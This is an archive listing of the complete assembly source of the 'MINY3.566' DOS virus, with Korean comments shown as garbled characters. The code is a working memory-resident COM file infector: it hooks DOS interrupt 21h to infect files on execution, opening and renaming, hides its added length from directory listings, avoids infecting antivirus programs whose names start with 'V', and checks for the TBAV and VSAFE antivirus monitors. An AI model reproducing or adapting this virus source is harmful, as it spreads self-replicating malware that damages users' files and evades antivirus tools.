home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / KOREACOL.ZIP / MINY.ZIP / MINY3.ZIP / MY3-566.ASM < prev    next >
Assembly Source File  |  1995-06-01  |  12KB  |  346 lines
  1. ;******************************************************************************
  2. ;*                                                                            *
  3. ;*        MINY3.566 Virus                                                     *
  4. ;*                                                                            *
  5. ;*     ┤ßôa ñß╕σ╖Ñ╗íôe í⌐£aòí »a╔I»a ╔A╟aôó╖í ┬üêaûA┤÷öa. DIR íw¥w╖a¥íôe ╗wêa *
  6. ;*   ╨e ï⌐╖íƒi ┤i«ü ┤⌠öa.                                                     *
  7. ;*                                                                            *
  8. ;******************************************************************************
  9.  
  10.  PARASIZE      EQU     (TVirEND - Start + 0Fh) SHR 4 ; £æ╡A¼ß └a╗í╨aôe ╟aïí
  11.  
  12.  VIRUS    SEGMENT PARA 'VIRUS'
  13.           ASSUME  CS:VIRUS, DS:VIRUS
  14.  
  15.  Start:   mov     SI,100h                    ; SI=ña╖í£ß»a »í╕b ║ü¡íêt
  16.           NOP
  17.           JMP     ChkVirinMEM                ; £æ ¼w║ü ╠a╦a¥í ╕±╧a
  18.           NOP
  19.           NOP
  20.  
  21.  Stealth:                                    ; »a╔I»a ¼a╢w
  22.           CALL    DWORD PTR cs:Oldint21      ; DIR ïíôw ╤í┬ë
  23.           pushf
  24.           cmp     al,0FFh                    ; ╡A£ß?
  25.           jz      Stealth_Exit
  26.           nop
  27.           nop
  28.           push    ax
  29.           push    si
  30.           push    ds
  31.  
  32.           mov     si, word ptr cs:OrgDTA     ; DIR »í 1ah ïíôw╖í ¼a╢wûAôeòA
  33.           mov     ds, word ptr cs:OrgDTA+2   ; ╖íúí êa¥í└à╥üöa.
  34.  
  35.           cmp     byte ptr [SI],0FFh         ; ╤┬╕w FCB ╖Ñêa?
  36.           jnz     No_NFCB
  37.           add     SI,+07                     ; ╤┬╕w╢w FCBƒi FCB ╡┴ ╔╖╖⌐ »í╟▒
  38.  No_NFCB: mov     AL,byte ptr [SI+17h]       ; ┴íƒi ┤Φôeöa.
  39.           and     AL,1Fh                     ; êq╡q╡aªü ê±¼a
  40.           NOP
  41.           cmp     AL,1Fh
  42.           JNZ     NoInfected
  43.           sub     Word ptr [Si+1Dh],offset VirEND ; COM ╠a╖⌐ ╖e═ü
  44.           sbb     word ptr [SI+1Fh],+00
  45.  NoInfected:
  46.           pop     ds
  47.           pop     si
  48.           pop     ax
  49.  Stealth_Exit:
  50.           popf
  51.           RETF    0002                       ; ò⌐┤aêaïí
  52.  
  53. ;*********************************************
  54. ;      ña╖í£ß»a Int 21h
  55. ;*********************************************
  56.  NewInt21:                                   ; ¼ü¥í╢à 21h ñσ ╖Ñ╚ߣ≤╦a
  57.           Pushf
  58.           cmp     ah,11h
  59.           jz      Stealth                    ; DIR íw¥w╖ííe ¡ó╖íïí
  60.           NOP
  61.           cmp     ah,12h
  62.           jz      Stealth
  63.           cmp     ah,4Bh                      ; »⌐╨ù╖Ñêa?
  64.           NOP
  65.           jz      InfectFile                  ; ╠a╖⌐ êq╡q ╤í┬ë
  66.           NOP
  67.  ChkAH:   cmp     ah,3Dh                      ; ╡í╧e ╖Ñêa?
  68.           NOP
  69.           jz      InfectFile
  70.           cmp     ah,43h                      ; ¡ó¼≈
  71.           NOP
  72.           jz      InfectFile
  73.           cmp     ah,56h                     ; ╠a╖⌐ ╖íƒq ñaÄüïí
  74.           jz      InfectFile
  75.           cmp     ah,6Ch                     ; ┬Aïe òí»a╡A ┬üêaûE ╡í╧e ñw»ó
  76.           jz      InfectFile
  77.           cmp     ah,41h                     ; ╠a╖⌐ ╗í╢üïí
  78.           jz      InfectFile
  79.           cmp     AX,0F038h                  ; £æ ¼w║ü ╡aªü ê±¼a╖Ñêa?
  80.           jnz     Chk_GetDTA
  81.           Popf
  82.           xor     ax,ax                      ; áx╖aíe 0000╖i ò⌐¥a║æ
  83.           IRET
  84.  
  85.  Chk_GetDTA:
  86.           cmp    ah,1ah                      ; DTA ║ü¡í ┤Φïí ╖Ñêa?
  87.           jnz    J_Int21
  88.           mov    word ptr cs:OrgDTA,dx
  89.           mov    word ptr cs:OrgDTA+2,ds
  90.  J_Int21:                                    ; ╢Ñ£ü int 21¥í ╕±╧a
  91.           Popf
  92.           DB      0EAh
  93.  OldInt21 DD      ?
  94.  
  95.  callInt21:
  96.           xchg    ah,al
  97.           PushF
  98.           call    dword ptr CS:[OldInt21]
  99.           RET
  100.  
  101. ;************************************************************
  102. ;      ╠a╖⌐ êq╡q »í╟íïí
  103. ;
  104.  InfectFile:
  105.           Push    AX                         ; ¥A╗í»a╚ß ╕ß╕w
  106.           Push    BX
  107.           Push    CX
  108.           Push    DX
  109.           Push    DS
  110.           Push    ES
  111.           Push    SI
  112.           Push    DI
  113.           cmp     ah,6ch                     ; ¼ü¥í╢à ╡í╧e ñw»ó╖Ñêa?
  114.           jz      Chk_EXTisCOM
  115.           mov     si,dx                      ; SI= ╠a╖⌐ »í╕b╢ß├í
  116.  Chk_EXTisCOM:
  117.           lodsb                              ; DS:[SI] -> AL
  118.           cmp     al,00                      ; ╠a╖⌐ Å{╖Ñêa?
  119.           jz      JumpExit
  120.           cmp     al,'V'                     ; ╠a╖⌐ ╖íƒq╡A V ╕a ╖╢ôeê⌡ ╣A╢A
  121.           jz      JumpExit                   ; V3,TV,TVRES ùw ╖e êq╡q╡A¼ß ╣A╢A
  122.           cmp     al,'.'                     ; ╤┬╕w╕a èüÑi?
  123.           jnz     Chk_EXTisCOM
  124.           lodsw
  125.           cmp     ax,'OC'                    ; ╤┬╕w╕aêa COM ╖Ñêa?
  126.           jnz     JumpExit
  127.           lodsb
  128.           cmp     al,'M'
  129.           jz      SetInt24h
  130.  JumpExit:
  131.           Jmp     Pop_all                    ; COM ╖í ┤aôííe ╣A╢A
  132.  
  133.  SetInt24h:
  134.           mov     bx,ds                      ; Int 24h ƒi êa¥í└àöa.
  135.           xor     ax,ax
  136.           mov     ds,ax
  137.           Push    DS:[0090h]
  138.           Push    DS:[0092h]
  139.           mov     word ptr DS:[0090h],offset NewInt24
  140.           mov     word ptr DS:[0092h],cs
  141.  
  142.           mov     ds,bx
  143.           mov     ax,0043h                   ; ¡ó¼≈ ┤Φïí
  144.           call    callInt21
  145.           Push    CX
  146.           Push    DX
  147.           Push    DS
  148.  
  149.           MOV     AX,0143h                   ; ╖¬ïí/│aïí ¡ó¼≈╖a¥í ñaÄæ
  150.           xor     cx,cx
  151.           call    callInt21
  152.           jnc     Open_File
  153.  J_SET:   JMP     SetOrgAttr                 ; ╡A£ßíe ƒí╚σ
  154.  Open_File:
  155.           NOP
  156.           mov     ax,023dh                   ; ╠a╖⌐ ╡í╧e ╨aïí
  157.           call    callInt21
  158.           jc      J_SET
  159.  
  160.           push    cs                         ; cs=ds=es
  161.           pop     ds
  162.           push    cs
  163.           pop     es
  164.           xchg    bx,ax                      ; ╨àùi ┤Φïí
  165.  
  166.  Read_File:
  167.           mov     ah,3Fh                     ; ╖¬┤ß ùi╖íïí
  168.           mov     dx,offset Org4bytes
  169.           mov     si,dx
  170.           mov     cx,0004h
  171.           int     21h
  172.  
  173.           mov     AX,word ptr [SI]           ; EXE ╠a╖⌐╖Ñ╗í ê±¼a
  174.           cmp     AX,'ZM'                    ; 'MZ'
  175.           jz      Close_File
  176.  
  177.           mov     al,byte ptr [SI+3]         ; êq╡q ╡aªü ╤┬╖Ñ
  178.           xor     al,38h                     ;
  179.           cmp     Al, [SI+2]                 ;
  180.           jz      Close_File
  181.  
  182.           mov     al,02h                     ; ╠a╖⌐╖ü ╣A╖⌐ ûߥí
  183.           call    Set_Pnt
  184.           cmp     ax,1234                    ; 1234 Ñíöa ╕b╖eêa?
  185.           jb      Close_File
  186.           cmp     ax,63000                   ; 63000 Ñíöa ╟eêa?
  187.           ja      Close_File
  188.  
  189.           push    AX                         ; JMP╢ß├í ëü¼e
  190.           add     AX,0100h                   ; COM ╖e 100h ªü╚ß »í╕b╨aúa¥í +100h
  191.           mov     word ptr start+1,AX        ; AX=ña╖í£ß»a »í╕b╕±
  192.           pop     AX
  193.           sub     ax,0003
  194.           mov     word ptr FileHead+1,ax
  195.           mov     al,byte ptr FileHead+2     ; êq╡q ╡aªü
  196.           xor     al,038h                    ;
  197.           mov     byte ptr FileHead+3,al
  198.  
  199.           mov     ax,5700h                   ; Éi╝a/»íêe ┤Φïí
  200.           Int     21h
  201.           Push    CX
  202.           Push    DX
  203.  
  204.           mov     al,40h                     ; ña╖í£ß»a │aïí
  205.           xor     dx,dx
  206.           mov     cx, offset VirEND
  207.           call    callInt21
  208.  
  209.           mov     al,00h                     ; ╠a╖⌐╖ü └ß╖q╖a¥í ╖íò╖
  210.           call    set_Pnt
  211.  
  212.           mov     al,40h                     ; ña╖í£ß»a │aïí
  213.           mov     dx, offset FileHead
  214.           mov     cx,0004h
  215.           call    callInt21
  216.  
  217.           Pop     dx                         ; ╢Ñ£ü Éi╝a¥í ñaÄüïí
  218.           Pop     CX
  219.           OR      CX,+1Fh                    ; ╕≈¼wòí»a╡A¼ßôe ¼ù¼≈ûI«ü ┤⌠ôe ┴í
  220.           mov     ax,5701h                   ; öe╢ß╖▒ (61┴í)
  221.           Int     21h
  222.  Close_File:                                 ; ╠a╖⌐ öhïí
  223.           mov     ah,3eh
  224.           Int     21h
  225.  
  226.  SetOrgAttr:
  227.           Pop     DS                         ; ╢Ñ£ü ¡ó¼≈╖a¥í ñaÄüïí
  228.           Pop     DX
  229.           pop     CX
  230.           mov     ax,0143h
  231.           Call    callInt21
  232.  
  233.           xor     ax,ax                      ; Int 24h Ñóèü
  234.           mov     ds,ax
  235.           POP     DS:[0092h]
  236.           POP     DS:[0090h]
  237.  Pop_All:
  238.           Pop     DI                         ; ╢Ñ£ü ¥A╗í»a╚ß Ñóèü
  239.           Pop     si
  240.           Pop     ES
  241.           Pop     ds
  242.           Pop     dx
  243.           Pop     cx
  244.           Pop     bx
  245.           Pop     ax
  246.           Jmp     J_Int21
  247.  
  248. ;*********************************************
  249. ;    £æ ¼w║ü ªüªà
  250. ;    òí»a╖ü ┬A¼w╢ß╡A ¼w║ü╨eöa.
  251.  
  252.  ChkVirinMEM:
  253.           xor     AX,AX                      ; Ñi ╧⌐╢a ┤⌠ôe ╖⌐ê{öa. ñeÑó╕Γ╖a¥í
  254.  G_LOOP:  nop                                ;  ┤aóü ╖üúí ┤⌠ôe Éü╢w╖i ñeÑó╨eöa.
  255.           inc     AX                         ;
  256.           cmp     AX,1111h                   ;
  257.           jnz     G_LOOP                     ;
  258.  
  259.           mov     dx,si                      ;
  260.           NOP
  261.           mov     ax,3521h                   ; ES:BX ƒí╚σ
  262.           Int     21h
  263.           cmp     word ptr ES:[000Ah],'BT'   ; ES:000A ╡A TBDRVX êa ╖╢╖aíe
  264.           jnz     ChkVSAFE                   ; TBAV ╡üñw╢w╖í ╖╢ôeê⌡╖íöa.
  265.           NOP
  266.           cmp     word ptr ES:[000Ch],'RD'
  267.           jz      Restart                    ; £æ╡A TBAV ╢w ╧a¥íïa£æ╖í ╣Ñ╕ü╨eöa.
  268.  ChkVSAFE:
  269.           cmp     byte ptr ES:[BX],0EAh      ; £æ╡A VSAFE êa ╣Ñ╕ü╨eöa.
  270.           jnz     ChkVirinM
  271.           cmp     word ptr ES:[BX+5],80FBh   ;
  272.           jnz     ChkVirinM
  273.           jmp     Restart
  274.  
  275.  ChkVirinM:
  276.           mov     ax,38F0h                   ; AX=F038h
  277.           xchg    ah,al                      ;
  278.           Int     21h                        ;
  279.           or      ax,ax                      ;
  280.           jz      Restart
  281.  
  282.           mov     word ptr OldInt21[SI],BX  ; Int 21h ║ü¡í ╕ß╕w
  283.           Mov     word ptr OldInt21[SI+2],ES
  284.  
  285.           Push    cs                         ; cs=ax
  286.           Pop     AX
  287.  
  288.           mov     CX, PARASIZE               ; ║ë╖⌐ £æ╟aïí
  289.           dec     ax
  290.           mov     ds,ax                      ; MCB (Memory Control Block)
  291.           mov     BX,0001
  292.           cmp     byte ptr [BX-1],'Z'        ; áa╗íáb ºi£Γ╖Ñêa?
  293.           jnz     restart
  294.           sub     word ptr [BX+02],CX        ; áa╗íáb ¡Aïaáσ╦a ëü¼e
  295.           sub     word ptr [BX+11h],CX       ; òí»aêa ¼a╢w╨i ╢w£╖ ║ë╖▒
  296.           mov     ES,word ptr [BX+11h]       ;
  297.           Push    cs                         ; CS=DS
  298.           Pop     ds
  299.           NOP
  300.           mov     si,DX                      ; ña╖í£ß»a Ñó¼a
  301.           xor     di,di                      ; IP=0000 ªü╚ß ╣Ñ╕ü╨eöa.
  302.           mov     cx, offset TVirEnd         ; ña╖í£ß»a ï⌐╖í
  303.           repz    movsb                      ; Ñó¼a
  304.           mov     ds,cx                      ; CX=0000
  305.           cli                                ;
  306.           mov     word ptr [BX+85h],es       ; BX=0001
  307.           mov     word ptr [BX+83h],offset NewInt21
  308.           sti
  309.  Restart:
  310.           mov     si,DX                      ; SI ôe ña╖í£ß»a »í╕b╢ß├í
  311.           push    cs                         ; cs=ds
  312.           pop     ds
  313.           push    cs                         ; ds=es
  314.           pop     es
  315.  
  316.           add     si,offset Org4bytes        ; ╢Ñ£ü òA╖í╚ß╖ü êt èü╨aïí
  317.           mov     di,00FFh                   ; FF+1 = 100h
  318.           Inc     DI
  319.           push    di                         ; └ß╖q 4ña╖í╦a Ñóèü
  320.           movsw
  321.           movsw
  322.           RET                                ; »a╚é╡A 100h êa ╕ß╕w
  323.  
  324.  Org4bytes        db 90h,90h,0cdh,20h        ; ╢Ñ£ü 4 ña╖í╦a╖ü êt
  325.  
  326.  Set_Pnt: xor     dx,dx                      ; ═í╖Ñ╚ß ╖íò╖ ╠≈¡e
  327.           xor     cx,cx
  328.           mov     ah,42h
  329.           Int     21h
  330.           RET
  331.  
  332.  NewInt24:                                   ; ╡A£ßêa Éa╗í ┤gëA╨eöa.
  333.           XOR     AL,AL
  334.           IRET
  335.  
  336.           DB      'Miny3'                    ; ña╖í£ß»a ╖íƒq
  337.  FileHead DB      0E9h
  338.  VirEND:
  339.           DB      ?,?,?
  340.  OrgDTA   DD      ?                          ; ╢Ñ£ü╖ü DTA êt
  341.  
  342.  TVirEND:
  343.  
  344.  Virus            EndS
  345.                   End  start
  346.